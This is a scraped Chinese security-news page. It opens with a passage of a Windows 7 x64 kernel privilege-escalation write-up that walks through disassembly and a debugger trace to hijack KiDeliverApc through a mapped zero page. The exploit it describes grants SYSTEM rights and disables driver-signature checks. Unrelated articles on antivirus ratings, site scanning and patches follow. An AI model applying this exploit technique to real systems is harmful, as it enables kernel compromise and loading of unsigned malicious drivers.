cli</p><p>20.&nbsp;&nbsp;.text:FFFFF800028DDC5A mov rcx, gs:20h</p><p>21.&nbsp;&nbsp;.text:FFFFF800028DDC63 mov rcx, [rcx+4BD8h]</p><p>22.&nbsp;&nbsp;.text:FFFFF800028DDC6A call RtlCaptureContext</p><p>23.&nbsp;&nbsp;.text:FFFFF800028DDC6F mov rcx, gs:20h</p><p>24.&nbsp;&nbsp;.text:FFFFF800028DDC78 add rcx, 40h</p><p>25.&nbsp;&nbsp;.text:FFFFF800028DDC7C call KiSaveProcessorControlState</p><p>26.&nbsp;&nbsp;.text:FFFFF800028DDC81 mov r10, gs:20h</p><p>27.&nbsp;&nbsp;.text:FFFFF800028DDC8A mov r10, [r10+4BD8h]</p><p>28.&nbsp;&nbsp;.text:FFFFF800028DDC91 mov rax, [rsp+38h+arg_0]</p><p>29.&nbsp;&nbsp;.text:FFFFF800028DDC96 mov [r10+80h], rax</p><p>30.&nbsp;&nbsp;.text:FFFFF800028DDC9D mov rax, [rsp+38h+var_8]</p><p>KeSaveProcessorControlState()函数将尝试把cr0寄存器的内容保存在GS:0x20处。</p><p>1.&nbsp; &nbsp; .text:FFFFF800028DDF70 KiSaveProcessorControlState</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DDF70 mov rax, cr0</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DDF73 mov [rcx], rax</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DDF76 mov rax, cr2</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DDF79 mov [rcx+8], rax</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DDF7D mov rax, cr3</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DDF80 mov [rcx+10h], rax</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DDF84 mov rax, cr4</p><p><strong>这可以被用来抛出一个页错误:<br /></strong><br />如果一个诸如0x54545454`54545454的值被存储在GS:0x20,那么页错误将被触发。<br /><br />在页错误处理程序中,我们的目标在于达到KiCheckForKernelApcDelivery()函数。它主要包括设置一个有效的指针GS:0x188(初始设置为0)。</p><p>1.&nbsp; &nbsp; .text:FFFFF800028DBC00 KiPageFault</p><p>2.&nbsp; &nbsp; .text:FFFFF800028DBC00</p><p>3.&nbsp; &nbsp; .text:FFFFF800028DBC00 var_158= dword ptr -158h</p><p>4.&nbsp; &nbsp; .text:FFFFF800028DBC00 var_138= dword ptr -138h</p><p>5.&nbsp; &nbsp; .text:FFFFF800028DBC00 var_12E= byte ptr -12Eh</p><p>6.&nbsp; &nbsp; .text:FFFFF800028DBC00 var_12D= byte ptr -12Dh</p><p>7.&nbsp; &nbsp; .text:FFFFF800028DBC00 var_12C= dword ptr -12Ch</p><p>8.&nbsp; &nbsp; .text:FFFFF800028DBC00 var_128= qword ptr -128h</p><p>9.&nbsp; &nbsp;&nbsp; &nbsp;[...]</p><p>10.&nbsp;&nbsp;.text:FFFFF800028DBC00 push rbp</p><p>11.&nbsp;&nbsp;.text:FFFFF800028DBC01 sub rsp, 158h</p><p>12.&nbsp;&nbsp;.text:FFFFF800028DBC08 lea rbp, [rsp+80h]</p><p>13.&nbsp;&nbsp;.text:FFFFF800028DBC10 mov [rbp+0D8h+var_12D], 1</p><p>14.&nbsp;&nbsp;.text:FFFFF800028DBC14 mov [rbp+0D8h+var_128], rax</p><p>15.&nbsp;&nbsp;.text:FFFFF800028DBC18 mov [rbp+0D8h+var_120], rcx</p><p>16.&nbsp;&nbsp;.text:FFFFF800028DBC1C mov [rbp+0D8h+var_118], rdx</p><p>17.&nbsp;&nbsp;.text:FFFFF800028DBC20 mov [rbp+0D8h+var_110], r8</p><p>18.&nbsp;&nbsp;.text:FFFFF800028DBC24 mov [rbp+0D8h+var_108], r9</p><p>19.&nbsp;&nbsp;.text:FFFFF800028DBC28 mov [rbp+0D8h+var_100], r10</p><p>20.&nbsp;&nbsp;.text:FFFFF800028DBC2C mov [rbp+0D8h+var_F8], r11</p><p>21.&nbsp;&nbsp;.text:FFFFF800028DBC30 test byte ptr [rbp+0D8h+arg_8], 1</p><p>22.&nbsp;&nbsp;.text:FFFFF800028DBC37 jz short loc_FFFFF800028DBCAD</p><p>23.&nbsp;&nbsp;.text:FFFFF800028DBC39 swapgs</p><p>24.&nbsp;&nbsp;.text:FFFFF800028DBC3C mov r10, gs:188h</p><p>25.&nbsp;&nbsp;.text:FFFFF800028DBC45 cmp [rbp+0D8h+arg_8], 33h ; '3'</p><p>26.&nbsp; &nbsp; [...]</p><p>27.&nbsp;&nbsp;.text:FFFFF800028DBCAD loc_FFFFF800028DBCAD:</p><p>28.&nbsp;&nbsp;; KiPageFault+A6 j</p><p>29.&nbsp;&nbsp;.text:FFFFF800028DBCAD cld</p><p>30.&nbsp;&nbsp;.text:FFFFF800028DBCAE stmxcsr [rbp+0D8h+var_12C]</p><p>31.&nbsp;&nbsp;.text:FFFFF800028DBCB2 ldmxcsr dword ptr gs:180h</p><p>32.&nbsp;&nbsp;.text:FFFFF800028DBCBB movaps [rbp+0D8h+var_E8], xmm0</p><p>33.&nbsp;&nbsp;.text:FFFFF800028DBCBF movaps [rbp+0D8h+var_D8], xmm1</p><p>34.&nbsp;&nbsp;.text:FFFFF800028DBCC3 movaps [rbp+0D8h+var_C8], xmm2</p><p>35.&nbsp;&nbsp;.text:FFFFF800028DBCC7 movaps [rbp+0D8h+var_B8], xmm3</p><p>36.&nbsp;&nbsp;.text:FFFFF800028DBCCB movaps [rbp+0D8h+var_A8], xmm4</p><p>37.&nbsp;&nbsp;.text:FFFFF800028DBCCF movaps [rbp+0D8h+var_98], xmm5</p><p>38.&nbsp;&nbsp;.text:FFFFF800028DBCD3 mov eax, cs:KiCodePatchCycle</p><p>39.&nbsp;&nbsp;.text:FFFFF800028DBCD9 mov [rbp+0D8h+arg_24], eax</p><p>40.&nbsp;&nbsp;.text:FFFFF800028DBCDF mov eax, [rbp+0E0h]</p><p>41.&nbsp;&nbsp;.text:FFFFF800028DBCE5 mov rcx, cr2</p><p>42.&nbsp;&nbsp;.text:FFFFF800028DBCE8 test [rbp+0D8h+arg_10], 200h</p><p>43.&nbsp;&nbsp;.text:FFFFF800028DBCF3 jz short loc_FFFFF800028DBCF6</p><p>44.&nbsp;&nbsp;.text:FFFFF800028DBCF5 sti</p><p>45.&nbsp; &nbsp; [...]</p><p>46.&nbsp;&nbsp;.text:FFFFF800028DBCF6 loc_FFFFF800028DBCF6:</p><p>47.&nbsp;&nbsp;.text:FFFFF800028DBCF6 mov r9, gs:188h</p><p>48.&nbsp;&nbsp;.text:FFFFF800028DBCFF bt dword ptr [r9+4Ch], 0Bh</p><p>49.&nbsp;&nbsp;.text:FFFFF800028DBD05 jnb short loc_FFFFF800028DBD15</p><p>50.&nbsp;&nbsp;.text:FFFFF800028DBD07 test byte ptr [rbp+0F0h], 1</p><p>51.&nbsp; &nbsp; [...]</p><p>52.&nbsp;&nbsp;.text:FFFFF800028EACF2 loc_FFFFF800028EACF2:</p><p>53.&nbsp;&nbsp;.text:FFFFF800028EACF2 mov r12, gs:188h</p><p>54.&nbsp;&nbsp;.text:FFFFF800028EACFB mov [rbp+0D0h+var_78], rdi</p><p>55.&nbsp;&nbsp;.text:FFFFF800028EACFF mov rcx, [r12+70h]</p><p>56.&nbsp;&nbsp;.text:FFFFF800028EAD04 mov [rbp+0D0h+var_98], rcx</p><p>57.&nbsp;&nbsp;.text:FFFFF800028EAD08 cmp dword ptr [rcx+438h], 10h</p><p>58.&nbsp;&nbsp;.text:FFFFF800028EAD0F lea r14, [rcx+398h]</p><p>59.&nbsp;&nbsp;.text:FFFFF800028EAD16 ja loc_FFFFF800028EB0E2</p><p>60.&nbsp;&nbsp;.text:FFFFF800028EAD1C mov eax, cs:MiDelayPageFaults</p><p>61.&nbsp;&nbsp;.text:FFFFF800028EAD22 test eax, eax</p><p>62.&nbsp; &nbsp; [...]</p><p>63.&nbsp;&nbsp;.text:FFFFF800028EC79C loc_FFFFF800028EC79C:</p><p>64.&nbsp;&nbsp;.text:FFFFF800028EC79C call KiCheckForKernelApcDelivery</p><p>65.&nbsp;&nbsp;.text:FFFFF800028EC7A1 jmp loc_FFFFF800028EAF75</p><p><strong>KiCheckForKernelApcDelivery()函数调用的KiDeliverApc():</strong></p><p>1.&nbsp; &nbsp; .text:FFFFF8000288AF10 KiCheckForKernelApcDelivery</p><p>2.&nbsp; &nbsp; .text:FFFFF8000288AF10 push rbx</p><p>3.&nbsp; &nbsp; .text:FFFFF8000288AF12 sub rsp, 20h</p><p>4.&nbsp; &nbsp; .text:FFFFF8000288AF16 mov rax, cr8</p><p>5.&nbsp; &nbsp; .text:FFFFF8000288AF1A mov ecx, 1</p><p>6.&nbsp; &nbsp; .text:FFFFF8000288AF1F test al, al</p><p>7.&nbsp; &nbsp; .text:FFFFF8000288AF21 jnz short loc_FFFFF8000288AF3F</p><p>8.&nbsp; &nbsp; .text:FFFFF8000288AF23 xor ebx, ebx</p><p>9.&nbsp; &nbsp; .text:FFFFF8000288AF25 mov cr8, rcx</p><p>10.&nbsp;&nbsp;.text:FFFFF8000288AF29 xor r8d, r8d</p><p>11.&nbsp;&nbsp;.text:FFFFF8000288AF2C xor edx, edx</p><p>12.&nbsp;&nbsp;.text:FFFFF8000288AF2E xor ecx, ecx</p><p>13.&nbsp;&nbsp;.text:FFFFF8000288AF30 call KiDeliverApc</p><p>14.&nbsp;&nbsp;.text:FFFFF8000288AF35 mov cr8, rbx</p><p><strong>这是一个实现代码执行的函数</strong>。它将提取GS:0x188中的指针,并在一系列解引用操作后设置R11寄存器,而R11寄存器用来调用另一个函数。</p><p>1.&nbsp; &nbsp; .text:FFFFF800028D1130 KiDeliverApc</p><p>2.&nbsp; &nbsp; .text:FFFFF800028D1130</p><p>3.&nbsp; &nbsp; .text:FFFFF800028D1130 var_78= dword ptr -78h</p><p>4.&nbsp; &nbsp; .text:FFFFF800028D1130 var_58= qword ptr -58h</p><p>5.&nbsp; &nbsp; .text:FFFFF800028D1130 var_50= qword ptr -50h</p><p>6.&nbsp; &nbsp; .text:FFFFF800028D1130 var_48= qword ptr -48h</p><p>7.&nbsp; &nbsp; .text:FFFFF800028D1130 var_40= qword ptr -40h</p><p>8.&nbsp; &nbsp; .text:FFFFF800028D1130 arg_0= qword ptr 8</p><p>9.&nbsp; &nbsp;&nbsp; &nbsp;[...]</p><p>10.&nbsp;&nbsp;.text:FFFFF800028D115B loc_FFFFF800028D115B:</p><p>11.&nbsp;&nbsp;.text:FFFFF800028D115B mov rbx, gs:188h</p><p>12.&nbsp;&nbsp;.text:FFFFF800028D1164 mov r15, [rbx+1D8h]</p><p>13.&nbsp;&nbsp;.text:FFFFF800028D116B mov r14, [rbx+70h]</p><p>14.&nbsp;&nbsp;.text:FFFFF800028D116F mov [rbx+79h], r9b</p><p>15.&nbsp;&nbsp;.text:FFFFF800028D1173 mov [rbx+1D8h], r8</p><p>16.&nbsp;&nbsp;.text:FFFFF800028D117A cmp [rbx+1C6h], r9w</p><p>17.&nbsp;&nbsp;.text:FFFFF800028D1182 jnz short loc_FFFFF800028D11A8</p><p>18.&nbsp;&nbsp;.text:FFFFF800028D1184 lock or [rsp+78h+var_78], r9d</p><p>19.&nbsp;&nbsp;.text:FFFFF800028D1189 lfence</p><p>20.&nbsp;&nbsp;.text:FFFFF800028D118C lea rsi, [rbx+50h]</p><p>21.&nbsp; &nbsp; [...]</p><p>22.&nbsp;&nbsp;.text:FFFFF800028D11EC loc_FFFFF800028D11EC:</p><p>23.&nbsp;&nbsp;.text:FFFFF800028D11EC mov r8, [rsi]</p><p>24.&nbsp;&nbsp;.text:FFFFF800028D11EF cmp r8, rsi</p><p>25.&nbsp;&nbsp;.text:FFFFF800028D11F2 jz loc_FFFFF800029296C7</p><p>26.&nbsp;&nbsp;.text:FFFFF800028D11F8 mov [rbx+79h], r9b</p><p>27.&nbsp;&nbsp;.text:FFFFF800028D11FC lea r10, [r8-10h]</p><p>28.&nbsp;&nbsp;.text:FFFFF800028D1200 prefetchw byte ptr [r10]</p><p>29.&nbsp;&nbsp;.text:FFFFF800028D1204 mov rcx, [r10+30h]</p><p>30.&nbsp;&nbsp;.text:FFFFF800028D1208 mov r11, [r10+20h]</p><p>31.&nbsp;&nbsp;.text:FFFFF800028D120C mov [rsp+78h+arg_10], rcx</p><p>32.&nbsp;&nbsp;.text:FFFFF800028D1214 mov rax, [r10+38h]</p><p>33.&nbsp; &nbsp; [...]</p><p>34.&nbsp;&nbsp;.text:FFFFF800028D12B0 loc_FFFFF800028D12B0:</p><p>35.&nbsp;&nbsp;.text:FFFFF800028D12B0 mov rax, [r8+8]</p><p>36.&nbsp;&nbsp;.text:FFFFF800028D12B4 mov rdx, [r8]</p><p>37.&nbsp;&nbsp;.text:FFFFF800028D12B7 mov [rax], rdx</p><p>38.&nbsp;&nbsp;.text:FFFFF800028D12BA mov [rdx+8], rax</p><p>39.&nbsp;&nbsp;.text:FFFFF800028D12BE mov [r10+52h], r9b</p><p>40.&nbsp;&nbsp;.text:FFFFF800028D12C2 lock and [rbx+88h], r9</p><p>41.&nbsp;&nbsp;.text:FFFFF800028D12CA movzx eax, r12b</p><p>42.&nbsp;&nbsp;.text:FFFFF800028D12CE mov cr8, rax</p><p>43.&nbsp;&nbsp;.text:FFFFF800028D12D2 lea rax, [rsp+78h+arg_18]</p><p>44.&nbsp;&nbsp;.text:FFFFF800028D12DA lea r9, [rsp+78h+var_48]</p><p>45.&nbsp;&nbsp;.text:FFFFF800028D12DF lea r8, [rsp+78h+var_40]</p><p>46.&nbsp;&nbsp;.text:FFFFF800028D12E4 lea rdx, [rsp+78h+arg_10]</p><p>47.&nbsp;&nbsp;.text:FFFFF800028D12EC mov rcx, r10</p><p>48.&nbsp;&nbsp;.text:FFFFF800028D12EF mov [rsp+78h+var_58], rax</p><p>49.&nbsp;&nbsp;.text:FFFFF800028D12F4 call r11</p><p>50.&nbsp;&nbsp;.text:FFFFF800028D12F7 xor r9d, r9d</p><p>51.&nbsp;&nbsp;.text:FFFFF800028D12FA jmp loc_FFFFF800028D1190</p><p>而如果R11寄存器指向一个内核shellcode并且内核调用它,则我们的shellcode就能可靠运行了。</p><p>下面我结合代码进行下简单的说明。</p><p>上面说了一大通东西,其实关键就是</p><p>1,&nbsp;&nbsp;挂钩特殊函数使其产生本无法产生的特殊非规范地址,并使指令跳到这个特殊非规范地址从而触发系统异常。</p><p>2,&nbsp;&nbsp;系统发生异常时候,通过设置一些特定的数据跳转,跳转到我们想要的地方。也就是最关键的函数</p><p>nt!KiDeliverApc,大家看代码的时候,需要结合标红的字段就可以理解SHELLCODE的布局了。</p><p>触发这个异常的时候,gs:188指向的是我们分配的0地址,所以</p><p>mov rbx, gs:188h&nbsp;&nbsp;rbx =0</p><p>lea rsi, [rbx+50h]&nbsp;&nbsp;rsi =0x50</p><p>mov r8, [rsi]&nbsp; &nbsp;r8 =0</p><p>lea r10, [r8-10h] r10 = -10h</p><p>mov r11, [r10+20h] r11 = 0x10</p><p>call r11&nbsp;&nbsp;call的是我们分配地址0+0x10的地方。</p><p>也就是代码里</p><p>*(PLONGLONG)((ULONG_PTR)0L+0x10) =&nbsp;&nbsp;KernelShellcodeAddress;</p><p>的精华所在,其他的大家看代码也就清楚了。</p><p>说明的是:</p><p><strong>原始的老外代码是VS2010 编译的,我修改为最常用的VS2008 编译</strong>,同时修改了些小BUG。</p><p>代码调试可以调试到</p><p>断点nt!KiUmsFastReturnToUser</p><p>Breakpoint 5 hit</p><p>nt!KiUmsFastReturnToUser+0x17e:</p><p>fffff800`0428907e 488b8de8000000&nbsp;&nbsp;mov&nbsp; &nbsp;&nbsp;&nbsp;rcx,qword ptr [rbp+0E8h] //构造的异常返回地址</p><p>2: kd&gt; p</p><p>nt!KiUmsFastReturnToUser+0x185:</p><p>fffff800`04289085 4c8b9df8000000&nbsp;&nbsp;mov&nbsp; &nbsp;&nbsp;&nbsp;r11,qword ptr [rbp+0F8h]</p><p>2: kd&gt; p</p><p>nt!KiUmsFastReturnToUser+0x18c:</p><p>fffff800`0428908c 498be9&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; mov&nbsp; &nbsp;&nbsp;&nbsp;rbp,r9</p><p>2: kd&gt; r</p><p>rax=0000000000000000 rbx=fffffa800fa0fb60 rcx=8000000000000000(构造的异常返回地址)</p><p>rdx=0000000000000000 rsi=0000000076f8edc0 rdi=0000000000000000</p><p>rip=fffff8000428908c rsp=fffff880097d2bb0 rbp=fffff880097d2c60</p><p>r8=00000000002ff6e0&nbsp;&nbsp;r9=00000000002ff6e0 r10=0000000000000000</p><p>r11=0000000000010246 r12=0000000000000001 r13=0000000000000001</p><p>r14=0000000000000000 r15=00000000771e84f0</p><p>iopl=0&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;nv up di pl zr na po nc</p><p>cs=0010&nbsp;&nbsp;ss=0018&nbsp;&nbsp;ds=002b&nbsp;&nbsp;es=002b&nbsp;&nbsp;fs=0053&nbsp;&nbsp;gs=002b&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; efl=00000046</p><p>nt!KiUmsFastReturnToUser+0x18c:</p><p>fffff800`0428908c 498be9&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; mov&nbsp; &nbsp;&nbsp;&nbsp;rbp,r9</p><p>后面SYSRET 触发异常后,不能对在异常处理的代码下断点,否则会触发蓝屏。</p><p>还有masm64New.rules文件拷贝到你的X:\Program Files\Microsoft Visual Studio 9.0\VC\VCProjectDefaults,X为你VC2008所在的盘。然后就可以调试即可。</p><p>代码里面也比较简单</p><p>1,&nbsp;&nbsp;不是WIN764 位就退出</p><p>2,&nbsp;&nbsp;UMS函数初始化失败也退出。</p><p>3,&nbsp;&nbsp;判断函数的参数,或者带PID,或者是EXE路劲,为了能使对应的程序为SYSTEM权限,及清除标志g_CiEnabled,从而可以安装加载非签名驱动,这2个是为了表明内核执行代码可能导致的危害性做的演示。</p><p>4,&nbsp;&nbsp;分配0地址,并填入一些特殊数据,确保执行流程按指定的方向执行。</p><p>5,&nbsp;&nbsp;设置好SHELLCODE,并将shellcode入口点填入地址0X10,从而使其被触发调用</p><p>6,&nbsp;&nbsp;调用UMS线程,调用到我们的HOOK,填入非规范地址,从而触发异常执行。</p><p><strong>最后补充下,这段代码在WIN8 64位下应该是无效的,因为WIN8 64不允许分配0地址,也不允许内核执行应用空间的代码。</strong></p> [安全产品]AV-C最新杀毒软件评级:360检测率中位列第一、误报率也是居世界首位-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/17903_1.html 西西 安全产品 2012/11/1 15:29:48 <p>日前世界杀毒软件评级机构AV-C(Anti Virus Compartive)公布了2012年7月最新版的杀毒软件评测结果。<span style="color:#ff0000;">结果显示,奇虎360软件除了在检测率中位列第一以外,其误报率也居全世界之首。</span>据悉,误报测试是考核杀毒软件的一个重要指标,误报引起的麻烦不亚于真正感染了病毒。</p><p>此次报告中指出,误报率极低为0-3次,微软与ESET位列其中;误报率低为4-15次,G DATA,Panda,eSan等位列其中;误报率高为15次以上,腾讯电脑管家,PC Tools等居于此位。而误报率极高的为100次以上,此栏中只有奇虎一家公司上榜。</p><p><img alt="" src="https://pic.cr173.com/up/2012-11/2012110115300030489.jpg" /></p><p>报告最后公布了此次的杀毒软件评级,级别分为三星(最佳),两星(优秀)以及一星(标准)。其中腾讯电脑管家为两星,奇虎360与今年3月版的评测结果一致,仍为一星。</p><p><img alt="" src="https://pic.cr173.com/up/2012-11/2012110115300029698.jpg" /></p><p>参与此次评级的杀毒软件共包括全世界18个主流杀毒软件,其中McAfee与趋势科技等由于更多依赖云查杀而不在此次软件评级范围之内。</p> [安全产品]金山网络针对安卓应用推出 “APK火眼分析系统”-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/17882_1.html 西西 安全产品 2012/10/31 21:34:31 <p>&nbsp;针对Android系统安全缺陷、市场审核不严、APP应用良莠不齐、各种灰色利益产业链不断催生等状况,近日金山网络全新推出 “&nbsp;APK火眼分析系统”。APK火眼分析系统是一套自动化的安卓应用动态行为分析系统。可以精准识别任何一个手机应用网站、电子市场上下载的安卓应用。查看应用是否正常,是否含广告或其他恶意行为。</p><p>在查看的同时APK火眼分析系统还能清晰描述该行为对用户的影响,帮助用户识别和判断。<br /><br /><img alt="" src="https://pic.cr173.com/up/2012-10/2012103121343482734.png" /><br /><br />使用APK火眼分析系统请点击<a href="http://fireeye.ijinshan.com">http://fireeye.ijinshan.com</a> </p> [安全产品]骚扰电话的克星、安全管家号码标记设置-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/17746_1.html 佚名 安全产品 2012/10/25 16:13:25 <p>&nbsp;无论是假期、工作日,骚扰电话,短信无时无刻,充斥着我们的手机收件箱,“买房”“中奖”“保险”“教育”,这些即是生活中的一部分,也是手机骚扰者的首选。但是在紧张的工作生活中,我们真的无暇应付。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;由于记不住号码,或者工作业务需要,被骚扰成为了尴尬的事情。对于从不说“no”的朋友想要挂断骚扰电话,想必还要想出很多说辞,编造一些“谎言”。怎么能给垃圾短信放个长假呢?安全管家的骚扰拦截功能成为用户的首选。</p><p>{insd m=&quot;0&quot; i=&quot;33687&quot;}&nbsp;<br /></p><p>&nbsp; &nbsp; &nbsp; &nbsp;下面,让我们来全方位解读一下安全管家新功能号码标记:</p><p>&nbsp; &nbsp; &nbsp;&nbsp;<strong>&nbsp;号码标记功能</strong>——解决对骚扰号码的标记问题。陌生号码来电时,如果选择挂机,会提示“是否立即对陌生号码进行标记”!点击“是”进入设置界面。贴心的服务,且设置十分方便!</p><p>&nbsp;<img alt="" src="https://pic.cr173.com/up/2012-10/2012102516144542863.jpg" /></p><p><br />&nbsp; &nbsp; &nbsp; &nbsp;可以对标记的号码进行查看,如果上次忘记设置还能通过右上角的“+”进行设置!<br /></p><p>&nbsp;<img alt="" src="https://pic.cr173.com/up/2012-10/2012102516141039535.jpg" /></p><p><br /></p><p>&nbsp; &nbsp; &nbsp; &nbsp;被标记过的号码,再来电话之后,效果就很明显了。这个功能不仅只对自己的功能,只要手机上安装了安全管家的,同一个号码来电的时候也会同样的显示!</p><p><img alt="" src="https://pic.cr173.com/up/2012-10/2012102516141095092.jpg" />&nbsp;</p><p><br /></p><p>&nbsp; &nbsp; &nbsp; &nbsp;同样有这个困惑的用户,也手动设置起来吧!主动设置号码标记功能同时,其他用户也能享受到这个功能的快捷!</p> [网络安全]百度网站安全检测工具升级上线、百度网站安全检测网址-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/17705_1.html 百度 网络安全 2012/10/24 14:55:29 <p>各位网站管理员: <br /><br />近期接到较多网站管理员反馈,当发现网站在百度搜索的结果里显示被黑后(“百度提示您:该页面可能因黑客侵入存在安全风险”),不知道具体哪里被黑,无法定位问题修复网站,非常着急无法快速修复问题,造成搜索流量和网站用户体验的双重损失。故我们对网站安全检测工具进行了升级,新升级的工具可以检测出网站被黑的详细类别,包括挂马、钓鱼、欺诈、违规内容,同时还有针对这些被黑的详细修复建议,让站长能够在最快速的时间里解决网站安全问题。网站被黑严重影响了网站运营和用户体验,同样也影响了搜索引擎的体验,解决被黑问题刻不容缓,百度安全联盟伙伴有千万级别的恶意库,保障百度搜索用户的访问安全。<br /><br />网站被黑会影响网站在百度网页搜索中的体现<br /><br />当网站管理员发现网站在百度网页搜索的结果里显示有风险后,可初步判定为该网站被黑,通过本工具来查询您的被黑的详细类别以及修复建议,尽快帮您定位解决问题,当您解除被黑状态,百度检测网站正常后(需要一定的时间和系统流程),网页搜索结果里的风险提示也会相应取消。如果网站频繁被黑,或被黑后如黑客发布大量对用户有损伤的内容,百度网页搜索也会在一段时间内降低对该网站的体现,避免用户受到黑客攻击网站的负面影响。希望网站用好网站安全监测工具,尽快修复被黑状态,保证网站的正常运营及用户体验。<br /><br />如何使用网站安全检测工具<br /><br />第一步,注册并登录百度站长平台<br /><br />第二步, 选择左侧“网站安全检测工具”<br /><br />第三步, 输入要检测的网址,可查看网站是否存在安全风险<br /><br />第四步,如果站点存在安全风险且已在站长平台验证过站点(提交网站并验证归属,具体验证网站归属方法可见帮助文档),可以点击查看被黑详情<br /><span style="font-size:18px;"><br />百度网站安全检测网址:</span><a href="http://zhanzhang.baidu.com/safe"><span style="font-size:18px;">http://zhanzhang.baidu.com/safe</span></a></p><p><img src="https://pic.cr173.com/up/2012-10/2012101024241457439598.jpg" alt="" /><br /><br />(温馨提示:只有验证过站点才可以查看风险详情,以及使用漏洞检测工具查看漏洞详情。)<br /><br />被黑类型说明<br /><br />1.挂马<br /><br />挂马指网站被黑客通过入侵手段拿到修改页面的权限,在网页的源代码中插入网页木马(恶意代码),用户在访问网页时就会运行网页木马受到漏洞攻击,从而自动下载并执行病毒木马程序。<br /><br />网站被挂马会导致访问网站的用户电脑感染病毒木马,可能会遭受远程控制、泄露文档资料、账户密码等信息,危害极大。网站在被其他人发现存在挂马后,搜索引擎、杀毒软件、浏览器等会进行拦截用户访问,直接导致网站不可访问,流失大量用户。<br /><br />2.钓鱼<br /><br />钓鱼是指页面仿冒某知名网站,让用户以为是正规网站,给用户造成损失。<br /><br />3.欺诈<br /><br />页面中存在欺骗用户、虚假的内容。<br /><br />4.违规内容<br /><br />内容存在违法信息,或者出于违法的灰色地带。</p> [系统安全]微软10月安全补丁、高危漏洞修复刻不容缓-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/17460_1.html 西西 系统安全 2012/10/11 9:27:03 <p>10月10日凌晨,微软发布10月安全公告。本次微软重点发布了Windows操作系统、Office套件、Server软件、Sql Server等多个严重漏洞修复补丁。电脑管家团队经过一夜奋战,已经第一时间推送了微软10月安全补丁,建议大家及时修复。</p><p>Windows操作系统是大多数网民必备的装机软件,其中编号为MS12-068的安全补丁可解决Microsoft Windows所有受支持版本(Windows 8和&nbsp;Windows Server 2012&nbsp;除外)中的一个秘密报告漏洞。如果攻击者登录系统并运行特制应用程序,则该漏洞可能允许提升特权。为此,电脑管家提醒广大网民尽快修复此漏洞,杜绝存在的安全隐患。</p><p>除此之外,编号为MS12-064的安全补丁可解决&nbsp;Microsoft Office&nbsp;中两个秘密报告漏洞。如果用户打开或预览特制的&nbsp;RTF文件,较严重的漏洞可能允许远程执行代码,成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。同理,MS12-065、MS12-066及MS12-067安全补丁主要修复office软件中已知的其它可被黑客利用的漏洞,为避免电脑成为肉鸡,建议广大网民尽快修复。</p><p>{insd m=&quot;0&quot; i=&quot;11253&quot;}</p><p>电脑管家在此提醒广大用户,漏洞始终是病毒木马入侵电脑的重要通道,及时安装安全更新,可以大大降低电脑被恶意攻击的可能性。电脑管家已向用户推送了10月安全补丁,请大家及时修复。</p><p><strong>电脑管家漏洞修复提示如下:</strong></p><p>&nbsp;<img src="https://pic.cr173.com/up/2012-10/2012101011110927341150.jpg" alt="" /></p><p><strong>&nbsp;电脑管家提示您,请及时修复本次漏洞,保证个人账号、财产安全。</strong></p><p><strong>&nbsp;微软官方信息如下:</strong></p><p><strong>Microsoft&nbsp;安全公告摘要&nbsp;(2012&nbsp;年&nbsp;10&nbsp;月)</strong></p><p><a href="http://technet.microsoft.com/zh-CN/security/bulletin/ms12-oct">http://technet.microsoft.com/zh-CN/security/bulletin/ms12-oct</a></p><table style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 0px; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; WORD-SPACING: 0px; FONT: 14px/22px Tahoma; TEXT-TRANSFORM: none; BORDER-LEFT: windowtext 1pt solid; WIDTH: 836px; COLOR: rgb(0,0,0); TEXT-INDENT: 0px; PADDING-TOP: 0px; BORDER-BOTTOM: windowtext 1pt solid; WHITE-SPACE: normal; LETTER-SPACING: normal; BORDER-COLLAPSE: collapse; BACKGROUND-COLOR: rgb(255,255,255); orphans: 2; widows: 2; webkit-text-size-adjust: auto; webkit-text-stroke-width: 0px; border-spacing: 0px" cellspacing="0" cellpadding="0" width="99%" border="1"><thead style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top"><strong>公告ID</strong></td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>公告标题和摘要</strong></td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; 